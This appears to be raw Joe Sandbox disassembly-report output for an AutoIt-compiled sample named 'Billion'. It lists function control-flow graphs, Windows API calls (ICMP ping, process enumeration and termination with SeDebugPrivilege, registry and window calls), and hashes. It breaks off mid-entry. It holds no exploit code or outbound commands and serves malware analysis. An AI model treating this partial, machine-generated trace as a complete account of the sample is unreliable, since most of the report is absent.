                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                          • String ID: t5 $t5 $t5 $t5 $t5 t5 $`
                                                                                                                                                                                                                                                                                                          • API String ID: 1385522511-678494459
                                                                                                                                                                                                                                                                                                          • Opcode ID: d7ae0aa0bd717eb5dbc0e758282f1e22c0b922a2dc788380502512c1f9c5042b
                                                                                                                                                                                                                                                                                                          • Instruction ID: a9e758a44cdd5919bfd2c04784868933bc5426d5678c50cb0426b423b6bb3ee4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7ae0aa0bd717eb5dbc0e758282f1e22c0b922a2dc788380502512c1f9c5042b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9B28C74A08300CFD729DF15C480A2AB7E1BF99304F25495DEA998B3A2D771ED85CF92
                                                                                                                                                                                                                                                                                                          Function 001B0FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 1762 1b0fb8-1b0fef call 13e6a0 1765 1b100f-1b1021 WSAStartup 1762->1765 1766 1b0ff1-1b0ffe call 13c98d 1762->1766 1768 1b1023-1b1031 1765->1768 1769 1b1054-1b1091 call 14c1f6 call 138ec0 call 14f9d4 inet_addr gethostbyname 1765->1769 1766->1765 1774 1b1000-1b100b call 13c98d 1766->1774 1771 1b1033 1768->1771 1772 1b1036-1b1046 1768->1772 1785 1b1093-1b10a0 IcmpCreateFile 1769->1785 1786 1b10a2-1b10b0 1769->1786 1771->1772 1775 1b104b-1b104f 1772->1775 1776 1b1048 1772->1776 1774->1765 1779 1b1249-1b1251 1775->1779 1776->1775 1785->1786 1787 1b10d3-1b1100 call 15017b call 13423c 1785->1787 1788 1b10b2 1786->1788 1789 1b10b5-1b10c5 1786->1789 1798 1b112b-1b1148 IcmpSendEcho 1787->1798 1799 1b1102-1b1129 IcmpSendEcho 1787->1799 1788->1789 1790 1b10ca-1b10ce 1789->1790 1791 1b10c7 1789->1791 1793 1b1240-1b1244 call 13bd98 1790->1793 1791->1790 1793->1779 1800 1b114c-1b114e 1798->1800 1799->1800 1801 1b11ae-1b11bc 1800->1801 1802 1b1150-1b1155 1800->1802 1805 1b11be 1801->1805 1806 1b11c1-1b11c8 1801->1806 1803 1b115b-1b1160 1802->1803 1804 1b11f8-1b120a call 13e6a0 1802->1804 1807 1b11ca-1b11d8 1803->1807 1808 1b1162-1b1167 1803->1808 1820 1b120c-1b120e 1804->1820 1821 1b1210 1804->1821 1805->1806 1810 1b11e4-1b11ed 1806->1810 1815 1b11da 1807->1815 1816 1b11dd 1807->1816 1808->1801 1813 1b1169-1b116e 1808->1813 1811 1b11ef 1810->1811 1812 1b11f2-1b11f6 1810->1812 1811->1812 1817 1b1212-1b1229 IcmpCloseHandle WSACleanup 1812->1817 1818 1b1193-1b11a1 1813->1818 1819 1b1170-1b1175 1813->1819 1815->1816 1816->1810 1817->1793 1825 1b122b-1b123d call 15013d call 150184 1817->1825 1823 1b11a3 1818->1823 1824 1b11a6-1b11ac 1818->1824 1819->1807 1822 1b1177-1b1185 1819->1822 1820->1817 1821->1817 1826 1b118a-1b1191 1822->1826 1827 1b1187 1822->1827 1823->1824 1824->1810 1825->1793 1826->1810 1827->1826
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000101,?), ref: 001B1019
                                                                                                                                                                                                                                                                                                          • inet_addr.WSOCK32(?), ref: 001B1079
                                                                                                                                                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 001B1085
                                                                                                                                                                                                                                                                                                          • IcmpCreateFile.IPHLPAPI ref: 001B1093
                                                                                                                                                                                                                                                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001B1123
                                                                                                                                                                                                                                                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001B1142
                                                                                                                                                                                                                                                                                                          • IcmpCloseHandle.IPHLPAPI(?), ref: 001B1216
                                                                                                                                                                                                                                                                                                          • WSACleanup.WSOCK32 ref: 001B121C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                                                          • String ID: Ping
                                                                                                                                                                                                                                                                                                          • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                                                          • Opcode ID: 94cc2f29d44837d0bdb5eb018ecf7db57d16bd60c7738fa5a1c1463b04f75673
                                                                                                                                                                                                                                                                                                          • Instruction ID: 44e64181360f84b44ae5b48e15652326d39a865375011dba133d3ced3835bf57
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94cc2f29d44837d0bdb5eb018ecf7db57d16bd60c7738fa5a1c1463b04f75673
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F191B171604201AFD720DF29C899F56BBE0FF48318F5A85A9F5658B6A2C730ED85CB81
                                                                                                                                                                                                                                                                                                          Function 00132793 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 153comCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001332AF
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 001332B7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001332C2
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001332CD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 001332D5
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 001332DD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00133205: RegisterWindowMessageW.USER32(00000004,?,00132964), ref: 0013325D
                                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00132A0A
                                                                                                                                                                                                                                                                                                          • OleInitialize.OLE32 ref: 00132A28
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000), ref: 00173A0D
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                                          • String ID: (& $0$ $4' $d( $$
                                                                                                                                                                                                                                                                                                          • API String ID: 1986988660-1076921426
                                                                                                                                                                                                                                                                                                          • Opcode ID: d3830fd7ac0757729a35899abc90b26c128a0d42239fcb3cd8d1833fd3242699
                                                                                                                                                                                                                                                                                                          • Instruction ID: 70d91a970f92cb35b1c04999bfdd3f120846dde8787888ed3b9b30e6e7bd2252
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3830fd7ac0757729a35899abc90b26c128a0d42239fcb3cd8d1833fd3242699
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A7167B4911300CEC789EF69BEAD6157EE4FB68304790912BE018D72A3EB70854D8F68
                                                                                                                                                                                                                                                                                                          Function 001690C5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 1875 1690c5-1690d5 1876 1690d7-1690ea call 15f636 call 15f649 1875->1876 1877 1690ef-1690f1 1875->1877 1895 169471 1876->1895 1878 1690f7-1690fd 1877->1878 1879 169459-169466 call 15f636 call 15f649 1877->1879 1878->1879 1881 169103-16912e 1878->1881 1896 16946c call 162b5c 1879->1896 1881->1879 1884 169134-16913d 1881->1884 1887 169157-169159 1884->1887 1888 16913f-169152 call 15f636 call 15f649 1884->1888 1893 169455-169457 1887->1893 1894 16915f-169163 1887->1894 1888->1896 1897 169474-169479 1893->1897 1894->1893 1899 169169-16916d 1894->1899 1895->1897 1896->1895 1899->1888 1902 16916f-169186 1899->1902 1904 1691a3-1691ac 1902->1904 1905 169188-16918b 1902->1905 1906 1691ae-1691c5 call 15f636 call 15f649 call 162b5c 1904->1906 1907 1691ca-1691d4 1904->1907 1908 169195-16919e 1905->1908 1909 16918d-169193 1905->1909 1938 16938c 1906->1938 1911 1691d6-1691d8 1907->1911 1912 1691db-1691dc call 163b93 1907->1912 1913 16923f-169259 1908->1913 1909->1906 1909->1908 1911->1912 1921 1691e1-1691f9 call 162d38 * 2 1912->1921 1915 16925f-16926f 1913->1915 1916 16932d-169336 call 16fc1b 1913->1916 1915->1916 1920 169275-169277 1915->1920 1927 169338-16934a 1916->1927 1928 1693a9 1916->1928 1920->1916 1924 16927d-1692a3 1920->1924 1942 169216-16923c call 1697a4 1921->1942 1943 1691fb-169211 call 15f649 call 15f636 1921->1943 1924->1916 1929 1692a9-1692bc 1924->1929 1927->1928 1933 16934c-16935b GetConsoleMode 1927->1933 1931 1693ad-1693c5 ReadFile 1928->1931 1929->1916 1934 1692be-1692c0 1929->1934 1936 1693c7-1693cd 1931->1936 1937 169421-16942c GetLastError 1931->1937 1933->1928 1939 16935d-169361 1933->1939 1934->1916 1940 1692c2-1692ed 1934->1940 1936->1937 1946 1693cf 1936->1946 1944 169445-169448 1937->1944 1945 16942e-169440 call 15f649 call 15f636 1937->1945 1948 16938f-169399 call 162d38 1938->1948 1939->1931 1947 169363-16937d ReadConsoleW 1939->1947 1940->1916 1949 1692ef-169302 1940->1949 1942->1913 1943->1938 1957 169385-16938b call 15f613 1944->1957 1958 16944e-169450 1944->1958 1945->1938 1954 1693d2-1693e4 1946->1954 1955 16939e-1693a7 1947->1955 1956 16937f GetLastError 1947->1956 1948->1897 1949->1916 1950 169304-169306 1949->1950 1950->1916 1961 169308-169328 1950->1961 1954->1948 1965 1693e6-1693ea 1954->1965 1955->1954 1956->1957 1957->1938 1958->1948 1961->1916 1969 169403-16940e 1965->1969 1970 1693ec-1693fc call 168de1 1965->1970 1975 169410 call 168f31 1969->1975 1976 16941a-16941f call 168c21 1969->1976 1981 1693ff-169401 1970->1981 1982 169415-169418 1975->1982 1976->1982 1981->1948 1982->1981
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: ac4ab92022cfcff3b941e38bea505153df3a4b65bed80a84df46068a9a1bd97b
                                                                                                                                                                                                                                                                                                          • Instruction ID: a5a16568acc146ca14a662293d84f6f43169f2b3f02488052eb778dc45f5f4a4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac4ab92022cfcff3b941e38bea505153df3a4b65bed80a84df46068a9a1bd97b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DC102B0A04349AFCF11DFA8DC45BADBBB8BF19310F144199E814AB3D2C7349962CB61
                                                                                                                                                                                                                                                                                                          Function 001BAB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 1983 1bab3f-1bab6e call 138ec0 call 19dd87 1987 1bab73-1bab76 1983->1987 1988 1babb9-1babbd 1987->1988 1989 1bab78-1bab98 call 13e6a0 1987->1989 1991 1bad29-1bad3a call 13e6a0 1988->1991 1992 1babc3-1babd7 OpenProcess 1988->1992 1997 1bab9a 1989->1997 1998 1bab9d-1babac 1989->1998 2006 1bad3c-1bad44 1991->2006 1995 1babdd-1babe6 GetLastError 1992->1995 1996 1bacc2-1baccd TerminateProcess 1992->1996 2002 1babec-1bac06 call 19d715 call 192010 1995->2002 2003 1bac72-1bac8f call 137b71 1995->2003 2000 1baccf-1bacf1 GetLastError call 137b71 1996->2000 2001 1bad20-1bad27 CloseHandle 1996->2001 1997->1998 2007 1babae 1998->2007 2008 1babb1-1babb4 1998->2008 2016 1bacf3 2000->2016 2017 1bacf6-1bad06 2000->2017 2001->2006 2024 1bac1a-1bac38 call 137b71 2002->2024 2025 1bac08-1bac18 OpenProcess 2002->2025 2014 1bac91 2003->2014 2015 1bac94-1baca4 2003->2015 2007->2008 2008->2006 2014->2015 2021 1baca9-1bacb7 call 13e6a0 2015->2021 2022 1baca6 2015->2022 2016->2017 2018 1bad0b-1bad19 call 13e6a0 2017->2018 2019 1bad08 2017->2019 2018->2001 2019->2018 2032 1bacbe-1bacc0 2021->2032 2022->2021 2035 1bac3a 2024->2035 2036 1bac3d-1bac4d 2024->2036 2028 1bac67-1bac70 call 191a0b 2025->2028 2028->2032 2032->1996 2032->2006 2035->2036 2037 1bac4f 2036->2037 2038 1bac52-1bac60 call 13e6a0 2036->2038 2037->2038 2038->2028
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0019DDAC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0019DDBA
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019DD87: CloseHandle.KERNEL32(00000000), ref: 0019DE87
                                                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001BABCA
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 001BABDD
                                                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001BAC10
                                                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 001BACC5
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 001BACD0
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001BAD21
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                                          • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                                                          • Opcode ID: dfada2eee4ac867bc276633ada85b1198a51127374bb4f694012e0e50b545e5e
                                                                                                                                                                                                                                                                                                          • Instruction ID: a04bfb4070932fb1b3e5a48b519a9ccadd014da54c2de9666ea34d9a6aafa705
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfada2eee4ac867bc276633ada85b1198a51127374bb4f694012e0e50b545e5e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1961C1B0204641AFD720DF15C495F65BBE1AF54318F98849CF4668BBA3C771EC85CB92
                                                                                                                                                                                                                                                                                                          Function 001335B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 2077 1335b3-133623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001335E1
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00133602
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00133368,?), ref: 00133616
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00133368,?), ref: 0013361F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                                          • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                                          • Opcode ID: c28aacb0f17a5f585ec4b6034d02f528ba68f01130f166c06b5cf9e2fcf157a0
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4ed184e5bc47a44c4fffed6553554e36b97fe493a2e6f9d6a20099f1ba7414fd
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c28aacb0f17a5f585ec4b6034d02f528ba68f01130f166c06b5cf9e2fcf157a0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2F0B771640394BAE72157177C0CE373EBDD7C6F54B00006FB904A7561D6695899DAB0
                                                                                                                                                                                                                                                                                                          Function 001361A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00175287
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00138577: _wcslen.LIBCMT ref: 0013858A
                                                                                                                                                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00136299
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                                                          • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0433511e224a36b3fea2d14fccc28491cf2fd61beaaa351a69e584b2f78a911b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6bd63186dc7f7d3e9f40d134b0144da9b55faee4a19b62c050dab1e44b8a4036
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0433511e224a36b3fea2d14fccc28491cf2fd61beaaa351a69e584b2f78a911b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B241B671408304AAC714EB60EC49EDFB7ECAF65314F00862EF999920A2EF74D649C792
                                                                                                                                                                                                                                                                                                          Function 001358CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,001358BE,SwapMouseButtons,00000004,?), ref: 001358EF
                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,001358BE,SwapMouseButtons,00000004,?), ref: 00135910
                                                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,001358BE,SwapMouseButtons,00000004,?), ref: 00135932
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                          • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                                          • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                                                          • Opcode ID: f30ce8ba0d5076932639c576081373a0e24f13821744c47417bc0a82167d7341
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1a1d1632efe3049c50f7bcbe505f2d7d259943bed1a6a000490b6ddd9d67c86e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f30ce8ba0d5076932639c576081373a0e24f13821744c47417bc0a82167d7341
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF115AB5510618FFDB218FA8DC80EAEBBB9EF00B64F104469F801E7210E3319E519760
                                                                                                                                                                                                                                                                                                          Function 0013F238 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29windowsleepCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0013F27B
                                                                                                                                                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 0013F289
                                                                                                                                                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0013F29F
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0013F2B1
                                                                                                                                                                                                                                                                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 001832D8
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
